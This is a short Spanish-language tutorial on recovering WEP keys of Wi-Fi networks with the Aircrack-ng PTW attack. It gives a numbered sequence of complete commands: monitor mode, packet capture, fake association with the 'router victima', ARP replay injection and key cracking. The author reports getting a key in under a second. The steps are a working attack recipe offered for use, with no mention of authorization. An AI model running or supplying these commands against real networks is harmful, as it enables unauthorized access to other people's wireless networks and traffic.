Aircrack PTW

Aircrack-ng es un programa crackeador de claves 802.11 WEP y WPA/WPA2-PSK. Aircrack-ng puede recuperar la clave WEP una vez que se han capturado suficientes paquetes encriptados con airodump-ng.


Encontrar la clave WEP de una red WIFI por este método requiere que paquetes "arp request/reply", y solo trabaja con encriptacion de 128 y 64 bits. 


Cuando se usa aircrack v1.x es el ataque por defecto, para utilizar el anterior metodo se debe poner la opcion -k, para versiones anteriores de aircrack que soportan PTW se debe usar la opcion -z.


He utilizado este metodo que resulto ser muy efectivo con la version 0.9.1 en Windows, encontro la clave en menos de 1s'. 

Metodología usada:

1. Poner la tarjeta en modo monitor: airmon-ng start rausb0
2. Capturar los paquetes: airodump-ng -c [channel] -w [network] --bssid [bssid AP] rausb0
3. Asociarse con el router victima: aireplay-ng -1 0 -a [BSSID AP] -h [MAC mia] -e [ESSID] rausb0
4. Envio de ARP: aireplay-ng -3 -b [BSSID AP] -h [MAC mia] rausb0
• En caso de que no se consigan: aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [MAC AP] -h [MAC mia] rausb0     --> Use this packet? y
• Otra opción es intentar conectarse con otra tarjeta o lapto a esta red para forzar paquetes arp.
5. Después de generar suficientes paquetes ejecutar Aircrack-ng -a 1 -z archivo.cap

Ejecutar cada ítem anterior en consolas independientes.

Mas documentación:

• http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
• http://www.aircrack-ng.org/doku.php
• http://www.aircrack-ng.org/doku.php?id=supported_packets
• http://en.wikipedia.org/wiki/Aircrack-ng